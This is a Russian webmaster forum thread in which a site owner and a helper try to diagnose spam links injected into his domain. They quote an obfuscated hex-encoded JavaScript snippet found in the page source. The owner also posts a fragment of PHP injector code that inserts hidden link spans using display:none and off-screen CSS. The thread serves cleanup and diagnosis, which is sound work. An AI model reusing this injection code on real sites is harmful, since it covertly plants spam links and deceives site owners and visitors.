Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Интернет » В помощь вебмастеру » Мусорные ссылки.

Модерирует : Cheery

 Версия для печати • ПодписатьсяДобавить в закладки

Открыть новую тему     Написать ответ в эту тему

gnom20109

Junior Member		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Уважаемые гуру. Возникла проблема  с сайтом.
1. Кто-то  подливает  мусорные  ссылки на сайт  или не существующие  страницы с этих мусорных  сайтов.  Т.е  в статистике   моего сайта  идут отказы по переходам, что влияет  на продвижение  ресурса.  Возможно, ли что-то сделать, что бы  поисковая  система    
хотя-бы не учитывала  эти мусорные  сайты и  не появлялись  мусорные  запросы в  поисковой выдаче?
 
Заранее  буду  благодарен  любой помощи.
 
 
Добавлено:

Цитата:
 сайтом

Инъекций  и заражений на  сайте  нету. От куда  это лезет не могу понять.
Всего записей: 106 | Зарегистр. 25-01-2014 | Отправлено: 13:06 07-01-2015
Mavrikii

Platinum Member		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
gnom20109

Цитата:
Кто-то  подливает  мусорные  ссылки на сайт  или не существующие  страницы с этих мусорных  сайтов.

примеры?
 

Цитата:
Инъекций  и заражений на  сайте  нету.

откуда такая уверенность? это может показываться только поисковикам, к примеру.
Всего записей: 15117 | Зарегистр. 20-09-2014 | Отправлено: 22:00 07-01-2015
gnom20109

Junior Member		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
1.Недавно устранял,  уязвимости 4-3  месяца назад  всё  после  заражения всё  чистил  образ сайта (чистый)  заливал  с резерва загрузочного диска линукс.
 
2. Ссылки появляются  только на определённом  домене (хост  хранилище  было  вычищено) и переходы  с  порно сайтов  тоже (американских порно сайтов).
.
3. Уверенность   такая,  что не  заражено и это не могут  быть инъекции  после удаления всех файлов (ресет  аккаунт). Даже  в  html   пустом файле  появляется,  много  левых ссылок (при просмотре через исходный код страницы в браузере, но при  просмотре кода  в дремвеере  ни каких ссылок нету).  Страничка сайт  надёжно  припаркован  даёт  такой  же  эффект куча заходов  с ссылок (порно содержания и всякой гадости, левых запросов). Хостер  рег.ру.
 
4.Такая  проблема только  на одном домене, которому 7 лет   и хорошо раскручен на  других доминах такого нету, ставил те же файлы те же cms  всё тоже.  
 
Что  это  такое хотя бы?
 
p/s Даже  пробовал  цеплять  домен  к  другому  хостеру  тоже самое.
Всего записей: 106 | Зарегистр. 25-01-2014 | Отправлено: 10:03 08-01-2015 | Исправлено: gnom20109, 10:06 08-01-2015
Mavrikii

Platinum Member		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
gnom20109

Цитата:
и переходы  с  порно сайтов  тоже  

"с" или "на"?  
если "с", то тут, как бы, от вас может и не зависеть. может ошибка спамеров, может была когда то дыра у вас и прикрыта (сам несколько лет так нарвался на дырявый скрипт и было полно ссылок на линк через него с виагрой). может просто раскручивают через публичные результаты webalizer и так далее.
Всего записей: 15117 | Зарегистр. 20-09-2014 | Отправлено: 20:22 08-01-2015
gnom20109

Junior Member		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
 цеплять  домен  к  другому  хостеру  тоже самое.

Да меня  вот что  больше  всего интересует,  когда  домин  цепляешь, на  другой  хост всё  остаётся  без  изменений  даже сделал  пустую  html безо всяких  скриптов,  но только  установлены  счётчики  аналитики  вижу левые скрытые  ссылки через код  браузера  на пустой  странице.   Это тогда  что  может быть?
Скрытые  такие  ссылки  хотя бы можно   закрыть, от  индексации  в коде  же страницы их  нет?
Всего записей: 106 | Зарегистр. 25-01-2014 | Отправлено: 11:10 09-01-2015
Mavrikii

Platinum Member		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
gnom20109

Цитата:
вижу левые скрытые  ссылки через код  браузера  на пустой  странице.   Это тогда  что  может быть

ссылку дайте.
Всего записей: 15117 | Зарегистр. 20-09-2014 | Отправлено: 11:16 09-01-2015
gnom20109

Junior Member		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Mavrikii
скину в личку   адрес сайта  может что нибудь подскажите.
Всего записей: 106 | Зарегистр. 25-01-2014 | Отправлено: 16:01 09-01-2015
Mavrikii

Platinum Member		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
gnom20109
ну, и где искать
Цитата:
левые скрытые  ссылки через код  браузера  на пустой  странице.

а, вижу

Цитата:
<span class="zdiudyuvhbvhkbyhtsrg">

 
так они в коде изначально есть, значит либо дыра в CMS, либо шаблон уже с такой вставкой (если взяли с левого сайта - бывает), либо эддоны к CMS с дырками.
 
информации недостаточно, чтобы сказать точно.  
 
ну и
Цитата:
<script language="JavaScript">var _0xa113=["\x32\x35\x38\x30\x38\x31\x38\x36\x37\x33\x36\x36\x32\x37\x31\x31\x38\x37\x36\x35\x37\x30\x38\x32\x36\x35\x38\x36\x38\x32\x38\x33\x36\x39", "\x36\x34\x38\x34\x37\x30\x37\x33\x36\x34\x38\x37\x37\x30\x38\x32\x38\x31\x38\x30\x36\x39\x38\x39\x36\x36\x37\x31\x38\x31\x37\x38\x37\x34", "\x36\x34\x38\x38\x32\x35\x37\x37\x37\x38\x37\x37", "\x36\x39\x39\x33\x32\x38\x31\x35\x38\x33\x38\x34\x38\x39\x37\x36\x36\x39\x33\x30","\x6C\x65\x6E\x67\x74\x68","","\x63\x68\x61\x72\x41\x74","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6A\x6F\x69\x6E","\x77\x72\x69\x74\x65"];function _0xad78(){var _0xee8bx2=0,_0xee8bx3,_0xee8bx4,_0xee8bx5,_0xee8bx6;var _0xee8bx7= new Array(_0xa113[0],_0xa113[1],_0xa113[2],_0xa113[3]);var _0xee8bx8=_0xee8bx7[_0xa113[4]];while(++_0xee8bx2<=_0xee8bx8){_0xee8bx3=_0xee8bx7[_0xee8bx8-_0xee8bx2];_0xee8bx5=_0xee8bx6=_0xa113[5];for(_0xee8bx4=0;_0xee8bx4<_0xee8bx3[_0xa113[4]];){_0xee8bx5+=_0xee8bx3[_0xa113[6]](_0xee8bx4++);if(_0xee8bx5[_0xa113[4]]==2){_0xee8bx6+=String[_0xa113[7]](parseInt(_0xee8bx5)+35-_0xee8bx8+_0xee8bx2);_0xee8bx5=_0xa113[5];} ;} ;_0xee8bx7[_0xee8bx8-_0xee8bx2]=_0xee8bx6;} ;document[_0xa113[9]](_0xee8bx7[_0xa113[8]](_0xa113[5]));} ;_0xad78();</script>

об этом тоже говорит.
Всего записей: 15117 | Зарегистр. 20-09-2014 | Отправлено: 20:47 09-01-2015 | Исправлено: Mavrikii, 20:51 09-01-2015
gnom20109

Junior Member		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
<span class="zdiudyuvhbvhkbyhtsrg">  

Если  заметили то id плавающий при  обновление  страницы  всегда  другой.
 
Шаблон  был  установлен  с html вёрстки.
 

Цитата:
<script language="JavaScript">var _0xa113=["\x32\x35\x38\x30\x38\x31\x38\x36\x37\x33\x36\x36\x32\x37\x31\x31\x38\x37\x36\x35\x37\x30\x38\x32\x36\x35\x38\x36\x38\x32\x38\x33\x36\x39", "\x36\x34\x38\x34\x37\x30\x37\x33\x36\x34\x38\x37\x37\x30\x38\x32\x38\x31\x38\x30\x36\x39\x38\x39\x36\x36\x37\x31\x38\x31\x37\x38\x37\x34", "\x36\x34\x38\x38\x32\x35\x37\x37\x37\x38\x37\x37", "\x36\x39\x39\x33\x32\x38\x31\x35\x38\x33\x38\x34\x38\x39\x37\x36\x36\x39\x33\x30","\x6C\x65\x6E\x67\x74\x68","","\x63\x68\x61\x72\x41\x74","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6A\x6F\x69\x6E","\x77\x72\x69\x74\x65"];function _0xad78(){var _0xee8bx2=0,_0xee8bx3,_0xee8bx4,_0xee8bx5,_0xee8bx6;var _0xee8bx7= new Array(_0xa113[0],_0xa113[1],_0xa113[2],_0xa113[3]);var _0xee8bx8=_0xee8bx7[_0xa113[4]];while(++_0xee8bx2<=_0xee8bx8){_0xee8bx3=_0xee8bx7[_0xee8bx8-_0xee8bx2];_0xee8bx5=_0xee8bx6=_0xa113[5];for(_0xee8bx4=0;_0xee8bx4<_0xee8bx3[_0xa113[4]];){_0xee8bx5+=_0xee8bx3[_0xa113[6]](_0xee8bx4++);if(_0xee8bx5[_0xa113[4]]==2){_0xee8bx6+=String[_0xa113[7]](parseInt(_0xee8bx5)+35-_0xee8bx8+_0xee8bx2);_0xee8bx5=_0xa113[5];} ;} ;_0xee8bx7[_0xee8bx8-_0xee8bx2]=_0xee8bx6;} ;document[_0xa113[9]](_0xee8bx7[_0xa113[8]](_0xa113[5]));} ;_0xad78();</script>  

Похоже  на скрипт вирусный.  
 
А  что  нужно  пишите.  
Всего записей: 106 | Зарегистр. 25-01-2014 | Отправлено: 11:05 10-01-2015
Mavrikii

Platinum Member		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
gnom20109

Цитата:
Если  заметили то id плавающий при  обновление  страницы  всегда  другой.  

Это и говорит, что за его генерацию отвечает кусок кода в вашей CMS.
Да что тут говорить - смотреть нужно, такая вещь может быть где угодно в коде.
Всего записей: 15117 | Зарегистр. 20-09-2014 | Отправлено: 15:39 10-01-2015
gnom20109

Junior Member		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
 отвечает кусок кода в вашей CMS.  

1. просмотрел  логи  сайта кроме  моих  изменений  ни каких  изменений не было ни в файлах сайта не в базе.
2.Ну если  он в коде кмс то  почему этих  ссылок нет  на другом домине или  на локальном  хосте?  
Где  рыть то?
 
 
Добавлено:
на  просмотр  годовых логов  убил  где то  недели 2.)
Всего записей: 106 | Зарегистр. 25-01-2014 | Отправлено: 17:52 10-01-2015 | Исправлено: gnom20109, 17:54 10-01-2015
Mavrikii

Platinum Member		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
gnom20109
Ну, к примеру, оставлен бэкдор после взлома и тот, кто ломал, знает о нем только по домену.
Поэтому на другом домене не активизируется.
Всего записей: 15117 | Зарегистр. 20-09-2014 | Отправлено: 17:57 10-01-2015
gnom20109

Junior Member		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Mavrikii
Так  если  это скрипт вставка,  то его  же можно  отследить, откуда выполняется из какого файла?  

Цитата:
на другом домене не активизируется.

Почему же  тоже  самое  с другого  хостера  когда домен vip цеплял  за другой  хостинг  ссылки то  остались? (кмс  стояла  другая)
Ни как  не могу понять,  что  это  за  гадость.
 
Добавлено:
$scriptContent = $this->getLongTail().'<script>document.getElementById("'.$tagId.'").style.display = "none";</script>';
        
        if (preg_match("#<body([^>]*)#is", $content)) {
            $content = preg_replace('#<body([^>]*)>#is', '<body\\1>'.$this->getLongTail().'<span id="'.$tagId.'">'.$text.'</span>'.$scriptContent, $content);
        } else {
            $content = $this->getLongTail().'<span id="'.$tagId.'">'.$text.'</span>'.$scriptContent.$content;
        }
        
        return $content;
    }
    
    function hideCssAbsolute($content, $text) {
        $className = $this->generateClass();
        
        $scriptContent = $this->getLongTail().'<style>.'.$className.'{position:absolute;top:-9999px}</style>';
        
        if (preg_match("#</head>#is", $content) && preg_match("#<body([^>]*)#is", $content)) {
            $content = preg_replace('#</head>#is', $scriptContent."\n".'</head>', $content);
            $content = preg_replace('#<body([^>]*)>#is', '<body\\1>'.$this->getLongTail().'<span class="'.$className.'">'.$text.'</span>', $content);
        } elseif (preg_match("#<body([^>]*)#is", $content)) {
            $content = preg_replace('#<body([^>]*)>#is', $scriptContent."\n".'</head><body\\1>'.$this->getLongTail().'<span class="'.$className.'">'.$text.'</span>', $content);
        } else {
            $content = $scriptContent."\n".$this->getLongTail().'<span class="'.$className.'">'.$text.'</span>'.$content;
        }
        
        return $content;
Вот  что  то нашёл  но это огрызок кода  ну  и как  ожидалось 64 кодировка с этими ссылками. Только  ссылки  всё равно остались.
Всего записей: 106 | Зарегистр. 25-01-2014 | Отправлено: 18:32 10-01-2015 | Исправлено: gnom20109, 18:33 10-01-2015
Открыть новую тему     Написать ответ в эту тему

Компьютерный форум Ru.Board » Интернет » В помощь вебмастеру » Мусорные ссылки.


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.B0ard
© Ru.B0ard 2000-2024

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru